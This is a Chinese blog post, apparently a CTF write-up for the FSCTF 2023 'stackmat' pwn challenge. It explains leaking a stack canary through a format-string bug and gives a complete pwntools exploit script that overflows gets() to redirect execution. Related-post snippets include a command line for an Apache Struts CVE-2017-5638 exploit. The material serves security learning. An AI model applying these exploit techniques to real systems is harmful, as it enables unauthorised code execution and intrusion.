【pwn】[FSCTF 2023]stackmat --格式化字符串漏洞泄露canary

最新推荐文章于 2024-05-18 16:18:30 发布
最新推荐文章于 2024-05-18 16:18:30 发布
阅读量134 收藏
点赞数
文章标签: c语言 安全 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/question55/article/details/134483262
版权

看一下程序的保护状态

开了canary,接着看一下代码逻辑

可以发现,这里有格式化字符串漏洞,同时gets函数有栈溢出漏洞,现在只需要确定我们输入到buf的内容在格式化字符的第几个参数就行

可以确定buf在格式化字符串的第8个参数,又因为buf的偏移是0x20,所以canary在11个参数,因为canary的偏移是0x8

exp:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io=remote("node4.anna.nssctf.cn",28679)

io.recvuntil(b"Do you kown canary\n")

io.send(b"AAAAAAAA%11$p")

io.recvuntil(b'0x')

canary=int(io.recv(16),16)

ret=0x40101a

io.recvuntil(b"overflow\n")

payload=b'a'*(0x30-0x8)+p64(canary)+b'a'*8+p64(0x401240)

io.send(payload)

io.interactive()

GGb0mb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-PWN刷题记录-18(格式化字符串漏洞
weixin_44145820的博客
05-08 1661
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
android 分钟 秒计时器_开发记录:连接Stackmat计时器
weixin_35945480的博客
01-28 698
阅读本文大约需要5分钟;如需节省时间可先看结论:还得再等等。一、Android 篇大约在0.6版的时候增加了连接ss计时器功能,那时候的手机大多都比较简单没有降噪之类的功能,作者本人使用某TC的Android系统2.3手机,加上一个手机音频麦克风分线器就可以获取ss计时器的音频信号,波形看上去非常完美。后面的手机功能越来越多,现在也几乎找不到不带降噪功能的Android设备,信号被降噪后...
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 1677
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
pwn刷题num10-----格式化字符串漏洞
tbsqigongzi的博客
04-22 349
攻防世界pwn新手区string 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启全部RELRO---got表不可写 开启canary保护---栈溢出需绕过canary 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 英文意思是:我们是巫师,我们会给你手,你不能自己打败龙...... 我们会告诉你两个秘密......秘密 [0]是6662a0秘密[1]是6662a4 不要告诉任何人 你的
pwn刷题num17-----格式化字符串泄露canary+栈溢出
tbsqigongzi的博客
04-23 1053
攻防世界pwn进阶区Mary_Morton 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行后,选1是栈溢出,选2是格式化字符串溢出,选3是退出程序 ida一下主函数 简单的程序,三种选择,选1进入stack()函数 buf占0x90字节,read函数读入0x100字节,寻找
pwn刷题num41---格式化字符串漏洞任意地址修改
tbsqigongzi的博客
05-02 582
BUUCTF-PWN-jarvisoj_fm 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需要绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看伪代码 简单的代码,可知只要x=4就可获得shell 思路 用read函数输入一个字符串,之后printf格式化字符串漏洞实现任意地址修改,将x的值改为4 先找一下输入
pwn刷题num26-----格式化字符串漏洞实现任意地址修改
tbsqigongzi的博客
04-27 445
BUUCTF-PWN-[第五空间2019 决赛]PWN5 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 开启canary保护-----栈溢出需绕过canary 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 程序运行后首先输入一个name 然后输入密码(passwd) 最后fail ida看一下伪代码 观察主函数,发现格式化字符串漏洞 printf(&buf);
pwn刷题num15----格式化字符串漏洞
tbsqigongzi的博客
04-22 343
攻防世界pwn进阶区实时数据监测 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO—got表仍可写 未开启canary保护—存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 ...
pwn刷题num8---格式化字符串漏洞
tbsqigongzi的博客
04-21 232
攻防世界pwn新手区CGfsb 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO—got表仍可写 开启canary保护—栈溢出需绕过canary 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 ida查看伪代码 观察主函数,发现printf(%s)存在格式化字符串漏洞 还发现存在 system(“cat flag”),执行这条语句就可以获得flag 前提是有个if语句,需要pwnme为
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
C语言——模拟实现库函数atoi
2302_80250536的博客
05-13 439
INT_MAX 和 INT_MIN 是 C语言 的两个预定义宏,代表了整型变量能够存储的最大正整数21474836472^31 − 1)和最小负整数-2^31这个值是相对于二进制补码表示的,也就是说,负数的范围比正数大 1,这两个宏在头文件中定义。
C语言:设计循环队列
最新发布
Another_Shi的博客
05-18 814
本篇博客是写完LeetCode_662.设计循环队列之后有感而发,于是写下了一些思路和总结。本题用了两种方法来解答——顺序表和链表。
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 135
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 364
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞的风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值